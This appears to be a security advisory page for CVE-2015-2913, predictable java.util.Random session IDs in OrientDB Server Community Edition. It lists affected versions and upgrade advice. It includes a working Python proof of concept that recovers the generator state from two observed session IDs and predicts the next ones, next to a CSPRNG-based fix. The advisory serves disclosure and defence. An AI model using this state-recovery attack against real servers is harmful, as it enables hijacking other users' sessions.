PT-2015-5971 · Orientdb · Orientdb Server Community Edition
Raffaela Frank
Published 2015-12-31 · Updated 2018-10-18
CVE-2015-2913
CVSS v3.1 5.9 Medium
| Vector | AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N |
Name of the Vulnerable Software and Affected Versions
OrientDB Server Community Edition versions 2.0.0 through 2.0.14
OrientDB Server Community Edition versions 2.1.x prior to 2.1.1
Description
The server relies on java.util.Random to generate HTTP session ID values in server/network/protocol/http/OHttpSessionManager.java. java.util.Random is a 48-bit linear congruential generator, not a cryptographically secure PRNG: each 32-bit output exposes 32 of the 48 state bits, so a remote attacker who obtains a few session IDs issued by the server can recover the generator's internal state and predict the session IDs issued to other users.
Recommendations
For OrientDB Server Community Edition versions 2.0.0 through 2.0.14, update to version 2.0.15 or later.
For OrientDB Server Community Edition versions 2.1.x prior to 2.1.1, update to version 2.1.1 or later.
Session IDs issued by a vulnerable build remain predictable until they expire, so invalidate existing HTTP sessions after upgrading.
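To make the description concrete, the following added example (written for this page, not OrientDB's own code) re-implements the java.util.Random LCG in Python, generates session IDs from it the way a hypothetical weak generator would (the `weak_session_id` format is an assumption for illustration, not the format OrientDB used), and shows an attacker recovering the generator state from two observed IDs and predicting the next ones. A `strong_session_id` built from the operating system CSPRNG is shown beside it; the Java equivalent of that fix is java.security.SecureRandom.

```python
import secrets

# Constants of java.util.Random's 48-bit linear congruential generator
# (seed = seed * 0x5DEECE66D + 0xB mod 2^48; next(bits) returns the top bits).
JAVA_MULT = 0x5DEECE66D
JAVA_ADD = 0xB
JAVA_MASK = (1 << 48) - 1


class JavaRandom:
    """Re-implementation of java.util.Random, sufficient for nextInt()."""

    def __init__(self, seed: int):
        # Random(long seed) scrambles the seed before first use.
        self.seed = (seed ^ JAVA_MULT) & JAVA_MASK

    @classmethod
    def from_state(cls, state: int) -> "JavaRandom":
        """Attacker side: build a generator whose internal state is already known."""
        rng = cls.__new__(cls)
        rng.seed = state & JAVA_MASK
        return rng

    def next_bits(self, bits: int) -> int:
        self.seed = (self.seed * JAVA_MULT + JAVA_ADD) & JAVA_MASK
        return self.seed >> (48 - bits)

    def next_int(self) -> int:
        value = self.next_bits(32)
        return value - (1 << 32) if value & (1 << 31) else value  # Java int is signed


def weak_session_id(rng: JavaRandom) -> str:
    """Hypothetical weak generator: one nextInt() call rendered as hex (assumed format)."""
    return "OS%08x" % (rng.next_int() & 0xFFFFFFFF)


def strong_session_id() -> str:
    """Hardened form: 128 bits from the OS CSPRNG; no internal state is exposed."""
    return "OS" + secrets.token_hex(16)


def parse_weak_session_id(session_id: str) -> int:
    return int(session_id[2:], 16)


def recover_state(out1: int, out2: int):
    """nextInt() leaks the top 32 of the 48 state bits; brute-force the missing 16 low bits.

    Returns the generator state right after out2 was produced, or None if the
    two values are not consecutive outputs of one java.util.Random instance.
    """
    high = (out1 & 0xFFFFFFFF) << 16
    target = out2 & 0xFFFFFFFF
    for low in range(1 << 16):
        candidate = high | low
        following = (candidate * JAVA_MULT + JAVA_ADD) & JAVA_MASK
        if following >> 16 == target:
            return following
    return None


def predict_session_ids(observed, count: int):
    """Given two consecutive weak session IDs, predict the next `count` IDs."""
    out1 = parse_weak_session_id(observed[0])
    out2 = parse_weak_session_id(observed[1])
    state = recover_state(out1, out2)
    if state is None:
        return []
    rng = JavaRandom.from_state(state)
    return [weak_session_id(rng) for _ in range(count)]


if __name__ == "__main__":
    server = JavaRandom(20151231)          # constructed seed for the demo
    issued = [weak_session_id(server) for _ in range(5)]
    print("issued   :", issued)
    print("predicted:", predict_session_ids(issued[:2], 3))
    print("strong   :", strong_session_id())
```

The search space is only 2^16 candidates because one 32-bit output already reveals two thirds of the state; nextLong() leaks both halves at once, and even bounded nextInt(n) outputs only increase the number of samples needed, not the feasibility. Any scheme that derives a session ID, token or nonce from java.util.Random is therefore predictable regardless of how the value is formatted.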
Fix
See the Recommendations above (update to 2.0.15 / 2.1.1 or later).
Weakness: Use of Insufficiently Random Values (CWE-330)
Impact: Information Disclosure
Related identifiers
Affected products
Orientdb Server Community Edition